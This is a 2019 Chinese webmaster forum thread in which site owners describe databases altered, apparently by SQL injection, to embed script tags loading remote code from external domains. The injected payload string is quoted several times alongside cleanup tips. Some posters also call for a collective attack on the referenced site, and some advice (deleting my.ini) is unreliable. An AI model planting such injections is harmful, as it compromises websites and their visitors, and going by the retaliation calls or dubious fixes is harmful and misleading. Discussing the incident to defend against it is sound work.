网站被挂马,出现新的方式

823066711 2月前 254

网站被挂马跳到其他网站
以前出现过相同情况
但只是修改文件

这次被挂马 发现是数据库被修改了

在img中多了以下
字段"><script src=https://www.365dytt.net/data/admin/repword2.txt></script><a a="\n
最新回复 (28)
  • q5241521 2月前
    0 引用 2
    我的也是啊
  • btkk77 2月前
    0 引用 3
    一样被挂了,两个站都被改了
  • lb20008 2月前
    0 引用 4
    本帖最后由 lb20008 于 2019-3-15 22:44 编辑

    一样,数据没有判断机制么,凡是带script的都拦截
  • lb20008 2月前
    0 引用 5
    只能批量替换"><script src=https://www.365dytt.net/data/admin/repword2.txt></script><a a="
  • mrpyk 2月前
    0 引用 6
    采集的问题,采集站的问题。
  • lb20008 2月前
    0 引用 7
    Quotemrpyk 发表于 2019-3-15 23:33
    采集的问题,采集站的问题。


    不可能,几十万数据图片都被加上了js代码,连1号数据都加上了。要是采集问题早就有了
  • jxssrxxh 2月前
    0 引用 8
    清楚干净后,可以考虑只给选择的权限,要更新的时候在加上。
  • oy86866 2月前
    0 引用 9
    一样被挂马。。我日~
  • oy86866 2月前
    0 引用 10
    Quotemrpyk 发表于 2019-3-15 23:33
    采集的问题,采集站的问题。


    不是,是昨天刚爆发的。特么的,SQL注入的太牛逼了!!!
  • 0 引用 11
    用安全狗可以,这个我攻击了,结果他是高防的
  • 0 引用 12
    他居然放在后台了,我找了半天不见这个代码
  • 0 引用 13
    集体是攻击他的网站 https://www.365dytt.net/
  • 0 引用 14
    集体是攻击他的网站 www.365dytt.net/
  • 1563920 2月前
    0 引用 15
    应该是sql注入,直接写入到数据库了。
  • KingVstr 2月前
    0 引用 16
    Quotelb20008 发表于 2019-3-15 22:38
    一样,数据没有判断机制么,凡是带script的都拦截


    请问如何设置呢
  • cqwwwnet 2月前
    0 引用 17
    集体是攻击他的网站 www.365dytt.net/
  • 0 引用 18
    本帖最后由 gujiahong 于 2019-3-17 10:43 编辑

    https://www.365dytt.net/这个网站是我的,我也是受害者,我目前已经删除了这个文件,每周被挂马,什么云锁,宝塔防篡改插件都无效。
  • lb20008 2月前
    0 引用 19
    Quotegujiahong 发表于 2019-3-17 10:02
    https://www.365dytt.net/这个网站是我的,我也是受害者,我目前已经删除了海洋的所有代码,改用其他系统了 ...


    那你这个文件咋还在...https://www.365dytt.net/data/admin/repword2.txt
  • 0 引用 20
    本帖最后由 gujiahong 于 2019-3-17 10:42 编辑

    不在了,我弄了404跳转页面。
  • 0 引用 21
    Quotea123698741 发表于 2019-3-16 22:15
    用安全狗可以,这个我攻击了,结果他是高防的


    你也不想想,如果这网站是他的,他会轻易暴露给你,还有为什么不把流量跳转到这个网站呢?这个站是我的,我也是受害者,这一个月来都被挂了好几次码了,每次改的文件都不一样,真头大。怪不得前天被攻击,还好我是高防服务器,不然就挂了!
  • 0 引用 22
    Quotegujiahong 发表于 2019-3-17 10:02
    https://www.365dytt.net/这个网站是我的,我也是受害者,我目前已经删除了这个文件,每周被挂马,什么云锁 ...


    安全狗设置TXT文件,这样他就没有办法上传txt文件了
  • 0 引用 23
    我也在img中多了以下字段
    uploads/allimg/190104/e6a571b385390122.jpg"><script src=https://52dy.me/data/admin/sitemap.txt></script><a a="

    如何处理头痛
  • winbiz 2月前
    0 引用 24
    我跟你一样,以前也只是修改文件,现在搞到数据库里面。

    不过引用的那个木马网址也是受害者,并非黑客本人的网站
  • winbiz 2月前
    0 引用 25
    Quote筑之风草 发表于 2019-3-18 11:18
    我也在img中多了以下字段
    uploads/allimg/190104/e6a571b385390122.jpg">


    跟你一毛一样,清理下数据库吧
  • winbiz 2月前
    0 引用 26
    Quotea123698741 发表于 2019-3-17 12:41
    安全狗设置TXT文件,这样他就没有办法上传txt文件了


    这个好像只有windows才能设置吧,linux如何防?
  • 0 引用 27
    Quotewinbiz 发表于 2019-3-18 12:29
    这个好像只有windows才能设置吧,linux如何防?


    删除 my.ini即可
  • winbiz 2月前
    0 引用 28
    Quotea123698741 发表于 2019-3-20 12:44
    删除 my.ini即可


    my.ini在哪个位置?
  • 0 引用 29
    Quotewinbiz 发表于 2019-3-20 21:38
    my.ini在哪个位置?


    数据库里面哦!!!!他是通过my.ini上传数据的
返回
发新帖